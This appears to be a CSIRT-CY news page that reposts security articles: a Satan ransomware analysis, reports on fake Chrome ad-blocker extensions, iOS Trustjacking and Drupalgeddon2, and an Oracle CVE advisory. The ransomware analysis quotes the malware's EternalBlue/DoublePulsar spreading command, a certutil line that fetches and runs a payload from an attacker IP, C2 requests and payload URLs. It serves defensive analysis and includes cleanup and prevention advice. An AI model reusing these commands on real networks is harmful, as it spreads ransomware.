Ειδοποιήσεις

Satan ransomware itself has been around since January 2017. In this analyze the new version of the infamous Satan ransomware, which since November 2017 has been using the ExternalBlue exploit to spread via the network, and consequently encrypt files.

 

Analysis

First up is a file inconspicuously named “sts.exe”, which may refer to “Satan spreader”.

The file is packed with PECompact 2, and is therefore only 30KB in filesize.

Notably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack. This is possibly due to a packer option in the Satan RaaS builder. Fun fact: Iron ransomware, which may be a spin-off from Satan, has used VMProtect.

“sts.exe” acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:

Figure 1: Download and extract two new files

 

Both files will be downloaded from 198.55.107[.]149, and use a custom User-Agent “RookIE/1.0“, which seems a rather unique User-Agent.

  • ms.exe has password: iamsatancryptor
  • client.exe has password: abcdefghijklmn

It appears the Satan ransomware developers showcase some sense of humor by using the password “iamsatancryptor”.

Once the user has executed “sts.exe”, they will get the following UAC prompt, if enabled:

Figure 2: UAC prompt

 

Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named “Cryptor.exe”. Figure 2 shows the command line options.

Curiously, and thanks to the s2 option, the start dialog will be hidden, but the extraction progress is displayed – this means we need to click through to install the ransomware. Even more curious: the setup is in Chinese.

Figure 3: End of setup screen

 

ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit – it does not appear to use its own.

The infection of other machines on the network will be achieved with the following command:

cmd /c cd /D C:\Users\Alluse~1\&blue.exe –TargetIp & star.exe –OutConfig a –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload down64.dll –TargetIp

We can then see an attempt to spread the ransomware to other machine in the same network:

Figure 4 – Spreading attempt over SMB, port 445

 

down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be injected in rundll32.exe by using DoublePulsar, and executes the following command:

cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe

This will be used for planting sts.exe on other machines in the network, and will consequently be executed.

Satan ransomware itself, which is contained in Client.exe, and will be dropped to C:\Cryptor.exe. This payload is also packed with PECompact 2. As usual, any database-related services and processes, which it does to also encrypt those files possibly in use by another process.

Figure 5 – Database-related processes

 

What’s new in this version of Satan, is that the exclusion list has changed slightly – it will not encrypt files with the following words in its path:

windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user

This exclusion list is reminiscent of Iron ransomware.

Satan will, after encryption, automatically open the following ransomware note: C:\_How_to_decrypt_files.txt:

Figure 6 – Ransom note

 

The note is, as usual, in English, Chinese and Korean, and demands the user to pay 0.3 BTC. Satan will prepend filenames with its email address, satan_pro@mail.ru, and append extensions with .satan. For example: [satan_pro@mail.ru]Desert.jpg.satan

 

BTC Wallet: 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo 

Email: satan_pro@mail.ru

Note: _How_to_decrypt_files.txt

It appears one person has already paid 0.2 BTC:
https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo

Satan will create a unique mutex, SATANAPP, so the ransomware won’t run twice. It will also generate a unique hardware ID and sends this to the C2 server:

GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1Connection: Keep-AliveUser-Agent: Winnet ClientHost: 198.55.107.149

As mentioned in the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017 last year. For example, 25005f06e9b45fad836641b19b96f4b3 is another downloader which works similar to what is posted in this blog. It would fetch the following files:

  • http://122.114.9.220/data/client.exe
  • http://122.114.9.220/data/ms.exe
  • http://122.114.9.220/data/winlog.exe

According to VirusTotal, the downloader file was uploaded:

2017-11-20 18:35:17 UTC ( 5 months ago )

For additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.

Disinfection

You may want to verify if any of the following files or folders exist:

  • C:\sts.exe
  • C:\Cryptor.exe
  • C:\ProgramData\ms.exe
  • C:\ProgramData\client.exe
  • C:\Windows\Temp\KSession

Prevention

Enable UAC

  • Enable Windows Update, and install them (especially verify if MS17-010 is installed)
  • Install an antivirus, and keep it up-to-date and running
  • Restrict, where possible, access to shares (ACLs)
  • Create backups! (and test them)

More ransomware prevention can be found here.

 

Conclusion

Satan is not the first ransomware to use EternalBlue (for example, WannaCry), however, it  does appear the developers of Satan are continuously improving and adding features to its ransomware.

Prevention is always better than disinfection/decryption.

 

The information contained in this website is for general information purposes only. The information is gathered from Security Boulevard while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

A security researcher has spotted five malicious ad blockers extension in the Google Chrome Store that had already been installed by at least 20 million users.

If you have installed any of the below-mentioned Ad blocker extension in your Chrome browser, you could have been hacked.

Unfortunately, malicious browser extensions are nothing new. They often have access to everything you do online and could allow its creators to steal any information victims enter into any website they visit, including passwords, web browsing history and credit card details.

Discovered by Andrey Meshkov, co-founder of Adguard, these five malicious extensions are copycat versions of some legitimate, well-known Ad Blockers.
Creators of these extensions also used popular keywords in their names and descriptions to rank top in the search results, increasing the possibility of getting more users to download them.
“All the extensions I’ve highlighted are simple rip-offs with a few lines of code and some analytics code added by the authors,” Meshkov says.

 

After Meshkov reported his findings to Google on Tuesday, the tech giant immediately removed all of the following mentioned malicious ad blockers extension from its Chrome Store:

  • AdRemover for Google Chrome™ (10 million+ users)
  • uBlock Plus (8 million+ users)
  • [Fake] Adblock Pro (2 million+ users)
  • HD for YouTube™ (400,000+ users)
  • Webutation (30,000+ users)

Meshkov downloaded the ‘AdRemover’ extension for Chrome, and after analyzing it, he discovered that malicious code hidden inside the modified version of jQuery, a well-known JavaScript library, sends information about some websites a user visits back to a remote server.

The malicious extension then receives commands from the remote server, which are executed in the extension ‘background page’ and can change your browser’s behaviour in any way.

To avoid detection, these commands send by the remote server are hidden inside a harmless-looking image.
“These commands are scripts which are then executed in the privileged context (extension’s background page) and can change your browser behaviour in any way,” Meshkov says.

“Basically, this is a botnet composed of browsers infected with the fake Adblock extensions,” Meshkov says. “The browser will do whatever the command center server owner orders it to do.”

The researcher also analyzed other extensions on the Chrome Store and found four more extensions using similar tactics.

Since browser extension takes permission to access to all the web pages you visit, it can do practically anything.

 

The information contained in this website is for general information purposes only. The information is gathered from The Hacker News while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

 

New Vulnerability called “iOS Trustjacking” discovered in the iOS device that allows an attacker to control the Vulnerable device remotely and perform various malicious activities.

An iOS Trustjacking exploits the vulnerability that presented in iTunes Wi-Fi sync which enables the attack to gain the remote access without any user interaction and gain persistent control to the victim’s device without any physical Interaction.

“iTunes Wi-Fi Sync” is one of the useful future that allows iOS devices to be synced with iTunes without having to connect the iOS device to the computer physically.

Previously discovered a related vulnerability and Attack such as juice jacking (new computer didn’t require any authorisation that leads to install malware),  Videojacking,(HDMI connection and get a screen recording of iOS devices) required users physical interaction to perform various malicious activities.

How does this iOS Trustjacking vulnerability works

iTunes Wi-Fi sync helps to communicate with the device without any physical connection, and the user requires to syncing the iOS device with iTunes first by connecting to a computer with a cable to achieve this future.(sync with the iOS device over Wi-Fi.)

If the user needs to access the new computer with their iOS device, it is asked to make this connection as a trust connection or not and once user allows it, then it accesses iOS device via the standard iTunes APIs.

 

So the attacker needs to take two steps:

  • Allow the device to connect to iTunes
  • Enable iTunes Wi-Fi sync

Interesting this is to enable “iTunes Wi-Fi sync” does not require the victim’s approval and can be conducted purely from the computer side.

So Attacker can possibility can easily take screenshots and display or recording them remotely also an attacker can get access to a lot of private information such as Photos, SMS / iMessage chats history, App data Etc..

According to the researcher, These steps can be automated by malicious software. They interestingly do not require any additional approval from the victim and don’t trigger any indication on the device that something is happening.

“To be able to view the victim’s device screen, the attacker needs to install the developer image suitable for the victim’s device iOS version; then, he can take screenshots repeatedly and view the device’s screen in near real time. Installing the developer image can be conducted over Wi-Fi and does not require regaining physical access to the device. “

Furthermore, a user should be careful while plugging an iPhone into a friend’s laptop for a quick charge or sharing selected files.

Apple provides an iTunes Wi-Fi sync feature in iOS that allows users to sync their iPhones to a computer wirelessly. To enable this feature, users have to grant one-time permission to a trusted computer (with iTunes) over a USB cable.

Once enabled, the feature allows the computer owner to secretly spy on your iPhone over the Wi-Fi network without requiring any authentication, even when your phone is no longer physically connected to that computer.

“Reading the text, the user is led to believe that this is only relevant while the device is physically connected to the computer, so assumes that disconnecting it will prevent any access to his private data,” Symantec said.

Since there is no obvious indication on the victim’s device, Symantec believes the feature could exploit the “relation of trust the victim has between his iOS device and a computer.”

Researchers suggest following scenarios where TrustJacking attack can be successfully performed, especially when you trust a wrong computer:

Connecting your phone to a free charger at an airport, and mistakenly approving the pop-up permission message to trust the connected station.

A remote attacker, not in the same Wi-Fi network can also access the iPhone data if malware has compromised the device owner’s own “trusted” PC or Mac.

Moreover, iTunes Wi-Fi sync feature could also be used to remotely install malware apps on your iPhone, as well as to download a backup and steal all your photos, SMS / iMessage chats history, and application data.

 

“An attacker can also use this access to the device to install malicious apps, and even replace existing apps with a modified wrapped version that looks exactly like the original app, but can spy on the user while using the app and even leverage private APIs to spy on other activities all the time,” Symantec said.

The TrustJacking attack could also allow trusted computers to watch your device’s screen in real-time by repeatedly taking remote screenshots, observing and recording your every action.

 

Apple has now introduced another security layer in iOS 11, asking users to enter their iPhone’s passcode while pairing their iPhone with a computer, after getting notified by the Symantec researchers.

However, Symantec says the loophole remains open, as the patch does not address the primary concern, i.e., the absence of noticeable indication or mandatory re-authentication between the user’s device and the trusted computer after a given interval of time.

“While we appreciate the mitigation that Apple has taken, we’d like to highlight that it does not address Trustjacking in a holistic manner,” Symantec’s Roy Iarchy said. “Once the user has chosen to trust the compromised computer, the rest of the exploit continues to work as described above.”

The best and simple way to protect yourself is to ensure that no unwanted computers are being trusted by your iOS device. For this, you can remove the trusted computers list by going to Settings → General → Reset → Reset Location & Privacy.

Also, most important, always deny the access when asked to trust the computer while charging your iOS device. Your device would still charge using the computer, without exposing your data.

 

The information contained in this website is for general information purposes only. The information is gathered from GBHackers and The Hacker News while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

 

Hackers have started exploiting a recently disclosed critical vulnerability in Drupal shortly after the public release of working exploit code.

Two weeks ago, Drupal security team discovered a highly critical remote code execution vulnerability, dubbed Drupalgeddon2, in its content management system software that could allow attackers to completely take over vulnerable websites.

To address this vulnerability the company immediately released updated versions of Drupal CMS without releasing any technical details of the vulnerability, giving more than a million sites enough time to patch the issue.

Security researchers at Check Point and Dofinity published complete technical details about this vulnerability (CVE-2018-7600), using which, a Russian security researcher published a proof-of-concept (PoC) exploit code for Drupalgeddon2 on GitHub.

The Drupalgeddon2 vulnerability that affects all versions of Drupal from 6 to 8 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations.

According to checkpoint’s disclosure, the vulnerability exists due to the insufficient sanitation of inputs passed via Form API (FAPI) AJAX requests.

“As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication,” Check Point researchers said.

“By exploiting this vulnerability, an attacker would have been able to carry out a full site takeover of any Drupal customer.”

However, shortly after the public release of the PoC exploit, which many confirmed to be functional, researchers at SucuriImperva, and the SANS Internet Storm Center started seeing attempts to exploit Drupalgeddon2, though none have yet to see any reports of websites being hacked.

Sites administrators still running vulnerable versions of Drupal are highly recommended to patch the vulnerability by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible to avoid exploits.

The vulnerability also affects Drupal 6, which is no longer supported by the company since February 2016, but a patch for the version has still been created.

 

The information contained in this website is for general information purposes only. The information is gathered from The Hacker News while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

 

CVE No: CVE-2018-2861

PUBLISHED: Apr 17 2018 12:00AM

UPDATED: Apr 18 2018 04:00AM

CVSS SCORE: 6.5

AFFECTED PRODUCT & VERSIONS: Oracle Retail Back Office 14.1.3, Oracle Retail Back Office 14.0.4, Oracle Retail Back Office 13.4.9

 

THREAT:

Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Retail Back Office.

IMPACT:

Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Back Office accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Retail Back Office.

SOLUTION:

Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible. Until you apply the Critical Patch Update fixes, it may be possible to reduce the risk of successful attack by blocking network protocols required by an attack. For attacks that require certain privileges or access to certain packages, removing the privileges or the ability to access the packages from users that do not need the privileges may help reduce the risk of successful attack. Both approaches may break application functionality, so Oracle strongly recommends that customers test changes on non-production systems. Neither approach should be considered a long-term solution as neither corrects the underlying problem.

IMPLEMENTATION:

Software patches and updates are available at: http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

RELEATED LINKS:

  1. http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
  2. http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-3678108.html#RAPP

 

The information contained in this website is for general information purposes only. The information is gathered from Security Focus while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.